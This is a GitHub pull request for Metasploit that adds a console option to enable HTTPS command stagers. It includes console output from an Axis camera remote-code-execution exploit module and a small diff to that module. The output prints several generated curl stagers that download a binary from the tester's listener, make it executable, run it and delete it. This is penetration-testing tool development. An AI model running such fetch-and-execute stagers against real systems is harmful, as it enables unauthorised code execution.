New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add CMDSTAGER::SSL datastore option #11160

Merged
merged 1 commit into from Dec 21, 2018

Conversation

Projects
None yet
4 participants
@wvu-r7
Copy link
Contributor

wvu-r7 commented Dec 21, 2018

It has come to my attention that since I added the HTTP(S) command stagers, no one has used HTTPS. This is probably why.

The CmdStager options hash takes precedence over any datastore options, so it was possible to enable SSL/TLS command stagers in code, just not in the console. This corrects that.

  • Add something like CMDSTAGER::SSLVERIFY?
msf5 exploit(linux/http/axis_srv_parhand_rce) > set cmdstager::ssl
cmdstager::ssl => false
msf5 exploit(linux/http/axis_srv_parhand_rce) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Using URL: http://0.0.0.0:8080/hFsBy6j
[*] Local IP: http://192.168.1.3:8080/hFsBy6j
[*] Generated command stager: ["curl${IFS}-so${IFS}/tmp/KpooVluv${IFS}http://127.0.0.1:8080/hFsBy6j;chmod${IFS}+x${IFS}/tmp/KpooVluv;/tmp/KpooVluv;rm${IFS}-f${IFS}/tmp/KpooVluv"]
^C[-] Exploit failed [user-interrupt]: Interrupt
[*] Server stopped.
[-] run: Interrupted
msf5 exploit(linux/http/axis_srv_parhand_rce) > set cmdstager::ssl true
cmdstager::ssl => true
msf5 exploit(linux/http/axis_srv_parhand_rce) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Using URL: https://0.0.0.0:8080/i4loX67WE8W9HkZ
[*] Local IP: https://192.168.1.3:8080/i4loX67WE8W9HkZ
[*] Generated command stager: ["curl${IFS}-kso${IFS}/tmp/XWGCoCbc${IFS}https://127.0.0.1:8080/i4loX67WE8W9HkZ;chmod${IFS}+x${IFS}/tmp/XWGCoCbc;/tmp/XWGCoCbc;rm${IFS}-f${IFS}/tmp/XWGCoCbc"]
[*] Command Stager progress - 100.00% done (154/154 bytes)
^C[*] Server stopped.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/axis_srv_parhand_rce) > edit
msf5 exploit(linux/http/axis_srv_parhand_rce) > git diff
[*] exec: git diff

diff --git a/modules/exploits/linux/http/axis_srv_parhand_rce.rb b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
index 540aa59299..a5d36e801a 100644
--- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb
+++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :unix_memory
       execute_command(payload.encoded)
     when :linux_dropper
-      execute_cmdstager(flavor: 'curl', nospace: true)
+      execute_cmdstager(flavor: 'curl', nospace: true, ssl: false)
     end
   end

msf5 exploit(linux/http/axis_srv_parhand_rce) > rerun
[*] Reloading module...

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Using URL: http://0.0.0.0:8080/Esl30G3
[*] Local IP: http://192.168.1.3:8080/Esl30G3
[*] Generated command stager: ["curl${IFS}-so${IFS}/tmp/ShmfZwQH${IFS}http://127.0.0.1:8080/Esl30G3;chmod${IFS}+x${IFS}/tmp/ShmfZwQH;/tmp/ShmfZwQH;rm${IFS}-f${IFS}/tmp/ShmfZwQH"]

#11128

Add CMDSTAGER::SSL datastore option
It has come to my attention that since I added the HTTP(S) command
stagers, no one has used HTTPS. This is probably why.

The CmdStager options hash takes precedence over any datastore options.

@wvu-r7 wvu-r7 requested a review from bcoles Dec 21, 2018

@busterb busterb self-assigned this Dec 21, 2018

@busterb busterb merged commit b4ff3b5 into rapid7:master Dec 21, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request Dec 21, 2018

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Dec 21, 2018

Release Notes

This exposes the ability to enable SSL/TLS command stagers via a new datastore option CMDSTAGER::SSL. Previously, developers had to enable the feature in code.

msjenkins-r7 added a commit that referenced this pull request Dec 21, 2018

@bcoles
Copy link
Contributor

bcoles left a comment

Seems legit

@wvu-r7 wvu-r7 deleted the wvu-r7:feature/cmdstager branch Dec 22, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment